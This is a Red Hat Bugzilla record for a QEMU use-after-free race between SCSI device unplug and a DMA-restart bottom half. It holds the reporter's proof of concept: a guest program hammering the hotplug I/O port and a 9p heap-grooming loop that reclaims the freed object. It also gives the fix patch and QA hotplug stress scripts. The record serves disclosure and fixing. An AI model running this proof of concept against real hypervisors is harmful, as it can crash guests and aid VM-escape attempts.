Bug 1854811 - scsi-bus.c: use-after-free due to race between device unplug and I/O operation causes guest crash
Summary: scsi-bus.c: use-after-free due to race between device unplug and I/O operatio...
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Enterprise Linux Advanced Virtualization
Classification: Red Hat
Component: qemu-kvm
Version: 8.2
Hardware: All
OS: Linux
unspecified
medium
Target Milestone: rc
: 8.3
Assignee: Maxim Levitsky
QA Contact: qing.wang
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2020-07-08 09:41 UTC by Prasad Pandit
Modified: 2021-05-25 06:42 UTC (History)
7 users (show)

Fixed In Version: qemu-kvm-5.2.0-6.module+el8.4.0+9871+53903be9
Doc Type: If docs needed, set a value
Doc Text:
Clone Of:
Environment:
Last Closed: 2021-05-25 06:42:26 UTC
Type: Bug
Target Upstream Version:
Embargoed:


Attachments (Terms of Use)
Qemu-scsi-use-after-free-reproducer (6.50 KB, application/x-tar)
2020-07-08 09:41 UTC, Prasad Pandit
no flags Details

Description Prasad Pandit 2020-07-08 09:41:16 UTC
Created attachment 1700266 [details]
Qemu-scsi-use-after-free-reproducer

Wenxiang Qian <leonwxqian> has reported this issue. It is quite similar to BZ#1812399 & BZ#1812399

  -> https://drive.google.com/file/d/1qGptfDhKJNs5OLQ6a2HPuT_-kRuvIBCu/view
  -> https://www.nul.pw/usr/uploads/2020/07/3118145955.jpg

Description of problem:

Overview:
=========
The "opaque" object in scsi_dma_restart_bh can be used after free. The operation qemu_bh_delete(s->bh); will use the freed "opaque (s)" object directly.

Freed "s (opaque)" can be occupied by other data, so the s->bh can point to
arbitrary address and freed by qemu_bh_delete later:

    void qemu_bh_delete(QEMUBH *bh){
        g_free(bh);
    }

Root cause of the vulnerability:
================================
1. Whenever there’s an SCSI device add/plugged into the guest, the callback
   scsi_dma_restart_cb will be added.
2. When there’s a state change in guest, callback scsi_dma_restart_cb will
   be called and schedule bottom half: scsi_dma_restart_bh with opaque=s if
   guest is not in shutdown process.
3. In main IO thread, there’s a loop of glib_pollfds_poll, when fd is
   ready, AIO operations will be called and then scsi_dma_restart_bh is
   called. (The 'USE' part)
4. Meanwhile, attacker could write something to IOPORT to unplug the
   device, and in another thread, will trigger acpi_pcihp_eject_slot , then
   device_unparent and will free the related memory to the device. (The 'FREE' part)
5. Step (3) (4) could cause a race condition, if (4) is called prior to (3), there’s a UaF.

Related code:
 *hw/scsi/scsi-bus.c*:scsi_dma_restart_cb, scsi_dma_restart_bh
 *hw/acpi/pcihp.c*:acpi_pcihp_eject_slot


Version-Release number of selected component (if applicable):
  - Host: Ubuntu 16.04 x86_64
  - Guest: Ubuntu 18.04 x86_64
  - Qemu: 4.2.0 (I checked the commit between 4.2.0-5.0.0 and I believe 5.0.0
    has the same problem)
  - libvirt: 6.0.0 with KVM enabled

How reproducible:
  - Some times the crash occurs.

Steps to Reproduce:

Different Ways To Trigger the Use-after-free:
=============================================
a. If the guest system could be suspended (paused), here’s a simple way to test:

  1. Know the slot number of the disk X being attached. (By finding the next available
     slot number from lspci)
  2. Do not attach disk X now, start a program in the guest. That program
     will *infinitely* write (2 << slot) to the IOPORT of the bus, try to
     release disk X.
  3. Pause the guest and attach disk X.
  4. Resume the guest. Now bh callback and the IOPORT write should run at the
     same time, and cause UAF by chance. If it is not succeeded, repeat steps 3-4.

PoC:
====
1. You can create a disk image and install Ubuntu on it, and then update "source file=" of d.xml
   to the path of the disk image ( The disk I used is about 4 GB, if you need that, I can try to
   share it through like Google cloud storage with you.).

    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/foo/bar.qcow2'/>              <==  <!--here-->
      <target dev='sda' bus='scsi'/>
      <address type='drive' controller='0' bus='0' target='0' unit='0'/>
    </disk>


2. We used 9p to occupy the memory of freed object. The strdup(malloc) here:
   You can create a new directory, such as ~/share, on the host, and create
   folder AAAA..(255 A's)/AAAA..(255 A's)/AAAAAAAAAA(10 A's) in ~/share. This
   will set up a 255+1+255+1+10=522 bytes directory which is the same size of
   freed SCSIDevice object (64 bit).

   Then modify the directory in d.xml, point it to ~/share:
     -> <qemu:arg value='local,id=share,path=/home/foo/share,security_model=none'/>

3. Create a disk, for example, run `qemu-img -f qcow2 ./foo.qcow2 10M` in the host,
   to create a disk and update the disk path in disk1.xml to ./foo.qcow2.

4. Run `virsh create d.xml` and a guest machine with the name "testpoc"
   should be listed in the libvirt.

5. Connect to testpoc and write this program and compile in guest:
   //io2.c:
  #include <sys/io.h>
  #include <stdlib.h>

  int main(void)
  {
     iopl(3);
     while(1) {
       outb(1<<2, 0xae08);
     }
     return 0;
  }

  Compile with: gcc -O2 ./io2.c -o ./io2

6. Please compile this in guest too :
  //9pacc.c
   #include <stdlib.h>
  #include <string.h>
  #include <unistd.h>
  #include <dirent.h>

  #define FSIZE  0x300

  int main(void)
  {
     char foo[256] = {0};
     char boo[256] = {0}
     char foldername[FSIZE] = {0};

     memset(foo, 0x41, 255);
     memset(boo, 0x42, 255);
     snprintf(foldername, FSIZE, "/home/leonwxqian/share/%s/%s/AAAAAAAAAA",foo, boo);

     DIR *dir = 0;
     while(1) {
       dir = opendir(foldername);
       closedir(dir);
     }

     return 0;
  }
  Compile with: gcc ./9pacc.c -o ./9pacc

7. Create folder ~/share in guest then (Please change this to the directory you created in step 2!)

  sudo mount -t 9p -o trans=virtio,version=9p2000.L share /home/leonwxqian/share

8. Start "./9pacc &" in guest
9. Start "sudo ./io2" in guest

10. Run "poc.sh" in the host machine, if it is not succeeded, run poc.sh again.


Actual results:
  - Guest VM crashes
  - https://www.nul.pw/usr/uploads/2020/07/3118145955.jpg

Expected results:
  - Should not crash the guest.


Additional info:

Comment 1 Prasad Pandit 2020-07-08 09:44:25 UTC
Proposed fix patch from Paolo Bonzini

| I think this is simpler than the issue that Maxim is working on.
| Wenxiang, would this fix your PoC?
| 
| diff --git a/hw/scsi/scsi-bus.c b/hw/scsi/scsi-bus.c
| index 1c980cab38..1b0cf91532 100644
| --- a/hw/scsi/scsi-bus.c
| +++ b/hw/scsi/scsi-bus.c
| @@ -137,6 +137,7 @@ static void scsi_dma_restart_bh(void *opaque)
|          scsi_req_unref(req);
|      }
|      aio_context_release(blk_get_aio_context(s->conf.blk));
| +    object_unref(OBJECT(s));
|  }
| 
|  void scsi_req_retry(SCSIRequest *req)
| @@ -155,6 +156,8 @@ static void scsi_dma_restart_cb(void *opaque, int
| running, RunState state)
|      }
|      if (!s->bh) {
|          AioContext *ctx = blk_get_aio_context(s->conf.blk);
| +        /* The reference is dropped in scsi_dma_restart_bh.  */
| +        object_ref(OBJECT(s));
|          s->bh = aio_bh_new(ctx, scsi_dma_restart_bh, s);
|          qemu_bh_schedule(s->bh);
|      }
| 
| Thanks,
| Paolo

Comment 2 qing.wang 2020-07-13 07:49:45 UTC
Hi, could you please take a view of customer how to reproduce this issue? like as using qemu command line to create vm, and what to do may hit this issue.

Comment 3 Prasad Pandit 2020-07-14 05:43:14 UTC
Hello Qing,

(In reply to qing.wang from comment #2)
> Hi, could you please take a view of customer how to reproduce this issue?
> like as using qemu command line to create vm, and what to do may hit this
> issue.

The attachment here contains 3 files - d.xml, disk1.xml and poc.sh

d.xml has the guest configuration and command line parameters in it.
Guest starts with

  $ virsh create --console d.xml

We need to edit d.xml and disk1.xml to set local guest image and qemu paths
as described above.

Hope it helps. Thank you.

Comment 7 Maxim Levitsky 2020-12-10 12:39:24 UTC
I tried to reproduce this with latest qemu 
(which contains my and Paulo's scsi/rcu work), 
and I wasn't able yet to hit this, however I do think that 
at least in theory the race is still there.

For the use after free to happen this sequence of events 
should still be possible in theory:

1. vm continue event schedules the scsi_dma_restart_bh 
   (this has to happen before the scsi device is unrealized 
    because first thing scsi_qdev_unrealize does is to 
    remove the VM state change callback which schedules 
    the scsi_dma_restart_bh)

2. scsi device is unrealized, dropped off the bus and scheduled
   to be removed by the RCU callback

3. rcu thread callback frees the scsi device.

4. for some reason only now the bottom half is run.

I'll send the Paulo's patch upstream to discuss it there.

Best regards,
   Maxim Levitsky

Comment 8 John Ferlan 2020-12-18 14:32:03 UTC
Resolved by qemu-kvm upstream commit cfd4e36352d4426221aa94da44a172da1aaa741b

Setting ITM=13 under the assumption Maxim will be able to post the downstream patch soon

We will need a qa_ack+ please too. Feel free to alter the ITM I chose to a later value.

Comment 15 Maxim Levitsky 2021-01-28 09:16:29 UTC
Yep.

Comment 20 qing.wang 2021-02-19 03:20:52 UTC
Test on
Red Hat Enterprise Linux release 8.4 Beta (Ootpa)
4.18.0-287.el8.x86_64
qemu-kvm-common-5.2.0-6.module+el8.4.0+9871+53903be9.x86_64

Test steps refer to https://bugzilla.redhat.com/show_bug.cgi?id=1812399#c27

Scenario 1: 
1.boot vm
virsh define pc.xml;virsh start pc

2.hotplug-unplug disk repeatly
while true;do virsh attach-device pc disk.xml; virsh detach-device pc disk.xml;done

Running over 10 hour , no crash issue found.

Scenario 2: 

1. create 40 image files 
qemu-img create -f qcow2 /home/kvm_autotest_root/images/stg0.qcow2 1G
...
qemu-img create -f qcow2 /home/kvm_autotest_root/images/stg40.qcow2 1G

2.boot vm
/usr/libexec/qemu-kvm \
    -name 'avocado-vt-vm1'  \
    -sandbox on  \
    -machine pc \
    -device pcie-root-port,id=pcie-root-port-0,multifunction=on,bus=pci.0,addr=0x2,chassis=1 \
    -device pcie-pci-bridge,id=pcie-pci-bridge-0,addr=0x0,bus=pcie-root-port-0  \
    -nodefaults \
    -device VGA,bus=pci.0,addr=0x3 \
    -m 2048  \
    -smp 12,maxcpus=12,cores=6,threads=1,sockets=2  \
    -device pcie-root-port,id=pcie-root-port-1,bus=pci.0,chassis=2 \
    -device pcie-root-port,id=pcie-root-port-2,port=0x2,bus=pci.0,chassis=3 \
    -device qemu-xhci,id=usb1,bus=pcie-root-port-1,addr=0x0 \
    -device usb-tablet,id=usb-tablet1,bus=usb1.0,port=1 \
    -object iothread,id=iothread1 \
    -device virtio-scsi,id=scsi0 \
    -device virtio-scsi,id=scsi1,iothread=iothread1 \
    -drive id=drive_image1,if=none,snapshot=off,aio=threads,cache=none,format=qcow2,file=/home/kvm_autotest_root/images/rhel831-64-virtio-scsi.qcow2 \
    -device scsi-hd,id=image1,drive=drive_image1,bootindex=0,bus=scsi0.0 \
    \
    -blockdev node-name=test_disk0,driver=file,filename=/home/kvm_autotest_root/images/stg0.qcow2 \
    -device scsi-hd,drive=test_disk0,bus=scsi1.0,bootindex=-1,id=scsi_disk0,channel=0,scsi-id=0,channel=0,scsi-id=0,lun=0,share-rw \
    -blockdev node-name=test_disk1,driver=file,filename=/home/kvm_autotest_root/images/stg1.qcow2 \
    -blockdev node-name=test_disk2,driver=file,filename=/home/kvm_autotest_root/images/stg2.qcow2 \
    -blockdev node-name=test_disk3,driver=file,filename=/home/kvm_autotest_root/images/stg3.qcow2 \
    -blockdev node-name=test_disk4,driver=file,filename=/home/kvm_autotest_root/images/stg4.qcow2 \
    -blockdev node-name=test_disk5,driver=file,filename=/home/kvm_autotest_root/images/stg5.qcow2 \
    -blockdev node-name=test_disk6,driver=file,filename=/home/kvm_autotest_root/images/stg6.qcow2 \
    -blockdev node-name=test_disk7,driver=file,filename=/home/kvm_autotest_root/images/stg7.qcow2 \
    -blockdev node-name=test_disk8,driver=file,filename=/home/kvm_autotest_root/images/stg8.qcow2 \
    -blockdev node-name=test_disk9,driver=file,filename=/home/kvm_autotest_root/images/stg9.qcow2 \
    -blockdev node-name=test_disk10,driver=file,filename=/home/kvm_autotest_root/images/stg10.qcow2 \
    -blockdev node-name=test_disk11,driver=file,filename=/home/kvm_autotest_root/images/stg11.qcow2 \
    -blockdev node-name=test_disk12,driver=file,filename=/home/kvm_autotest_root/images/stg12.qcow2 \
    -blockdev node-name=test_disk13,driver=file,filename=/home/kvm_autotest_root/images/stg13.qcow2 \
    -blockdev node-name=test_disk14,driver=file,filename=/home/kvm_autotest_root/images/stg14.qcow2 \
    -blockdev node-name=test_disk15,driver=file,filename=/home/kvm_autotest_root/images/stg15.qcow2 \
    -blockdev node-name=test_disk16,driver=file,filename=/home/kvm_autotest_root/images/stg16.qcow2 \
    -blockdev node-name=test_disk17,driver=file,filename=/home/kvm_autotest_root/images/stg17.qcow2 \
    -blockdev node-name=test_disk18,driver=file,filename=/home/kvm_autotest_root/images/stg18.qcow2 \
    -blockdev node-name=test_disk19,driver=file,filename=/home/kvm_autotest_root/images/stg19.qcow2 \
    -blockdev node-name=test_disk20,driver=file,filename=/home/kvm_autotest_root/images/stg20.qcow2 \
    -blockdev node-name=test_disk21,driver=file,filename=/home/kvm_autotest_root/images/stg21.qcow2 \
    -blockdev node-name=test_disk22,driver=file,filename=/home/kvm_autotest_root/images/stg22.qcow2 \
    -blockdev node-name=test_disk23,driver=file,filename=/home/kvm_autotest_root/images/stg23.qcow2 \
    -blockdev node-name=test_disk24,driver=file,filename=/home/kvm_autotest_root/images/stg24.qcow2 \
    -blockdev node-name=test_disk25,driver=file,filename=/home/kvm_autotest_root/images/stg25.qcow2 \
    -blockdev node-name=test_disk26,driver=file,filename=/home/kvm_autotest_root/images/stg26.qcow2 \
    -blockdev node-name=test_disk27,driver=file,filename=/home/kvm_autotest_root/images/stg27.qcow2 \
    -blockdev node-name=test_disk28,driver=file,filename=/home/kvm_autotest_root/images/stg28.qcow2 \
    -blockdev node-name=test_disk29,driver=file,filename=/home/kvm_autotest_root/images/stg29.qcow2 \
    -blockdev node-name=test_disk30,driver=file,filename=/home/kvm_autotest_root/images/stg30.qcow2 \
    -blockdev node-name=test_disk31,driver=file,filename=/home/kvm_autotest_root/images/stg31.qcow2 \
    -blockdev node-name=test_disk32,driver=file,filename=/home/kvm_autotest_root/images/stg32.qcow2 \
    -blockdev node-name=test_disk33,driver=file,filename=/home/kvm_autotest_root/images/stg33.qcow2 \
    -blockdev node-name=test_disk34,driver=file,filename=/home/kvm_autotest_root/images/stg34.qcow2 \
    -blockdev node-name=test_disk35,driver=file,filename=/home/kvm_autotest_root/images/stg35.qcow2 \
    -blockdev node-name=test_disk36,driver=file,filename=/home/kvm_autotest_root/images/stg36.qcow2 \
    -blockdev node-name=test_disk37,driver=file,filename=/home/kvm_autotest_root/images/stg37.qcow2 \
    -blockdev node-name=test_disk38,driver=file,filename=/home/kvm_autotest_root/images/stg38.qcow2 \
    -blockdev node-name=test_disk39,driver=file,filename=/home/kvm_autotest_root/images/stg39.qcow2 \
    -blockdev node-name=test_disk40,driver=file,filename=/home/kvm_autotest_root/images/stg40.qcow2 \
    \
    -device pcie-root-port,id=pcie-root-port-3,port=0x3,bus=pci.0,chassis=4 \
    -device virtio-net-pci,mac=9a:21:f7:4a:1e:bd,id=idRuZxfv,netdev=idOpPVAe,bus=pcie-root-port-3,addr=0x0  \
    -netdev tap,id=idOpPVAe,vhost=on  \
    -rtc base=localtime,clock=host,driftfix=slew  \
    -boot menu=off,order=cdn,once=c,strict=off \
    -enable-kvm \
    -vnc :5  \
    -rtc base=localtime,clock=host,driftfix=slew  \
    -boot order=cdn,once=c,menu=off,strict=off \
    -enable-kvm \
    -device pcie-root-port,id=pcie_extra_root_port_0,bus=pci.0 \
    -monitor stdio \
    -chardev file,id=qmp_id_qmpmonitor1,path=/var/tmp/monitor-qmpdbg.log,server,nowait \
    -mon chardev=qmp_id_qmpmonitor1,mode=control  \
    -qmp tcp:0:5955,server,nowait  \
    -chardev file,path=/var/tmp/monitor-serialdbg.log,id=serial_id_serial0 \
    -device isa-serial,chardev=serial_id_serial0  \

3.login guest and execute sg_luns with multi instances
trap 'kill $(jobs -p)' EXIT SIGINT

for i in `seq 0 32` ; do
	while true ; do
#		sg_luns /dev/sdb > /dev/null 2>&1
    sg_luns /dev/sdb
	done &
done
echo "wait"
wait

4.hotplug-unlug multi disks repeatly on each 3 seconds
NUM_LUNS=40
add_devices() {
  exec 3<>/dev/tcp/localhost/5955
  echo "$@"
  echo -e "{'execute':'qmp_capabilities'}" >&3
  read response <&3
  echo $response
  for i in $(seq 1 $NUM_LUNS) ; do
  cmd="{'execute':'device_add', 'arguments': {'driver':'scsi-hd','drive':'test_disk$i','id':'scsi_disk$i','bus':'scsi1.0','lun':$i}}"
  echo "$cmd"
  echo -e "$cmd" >&3
  read response <&3
  echo "$response"
  done
}

remove_devices() {
  exec 3<>/dev/tcp/localhost/5955
  echo "$@"
  echo -e "{'execute':'qmp_capabilities'}" >&3
  read response <&3
  echo $response
  for i in $(seq 1 $NUM_LUNS) ; do
  cmd="{'execute':'device_del', 'arguments': {'id':'scsi_disk$i'}}"
  echo "$cmd"
  echo -e "$cmd" >&3
  read response <&3
  echo "$response"
  done
}


while true ; do
    echo "adding devices"
    add_devices
    sleep 3
    echo "removing devices"
    remove_devices
    sleep 3
done

running over 10 hour, no crash issue found.

Comment 22 errata-xmlrpc 2021-05-25 06:42:26 UTC
Since the problem described in this bug report should be
resolved in a recent advisory, it has been closed with a
resolution of ERRATA.

For information on the advisory (virt:av bug fix and enhancement update), and where to find the updated
files, follow the link below.

If the solution does not work for you, open a new bug report.

https://access.redhat.com/errata/RHBA-2021:2098


Note You need to log in before you can comment on or make changes to this bug.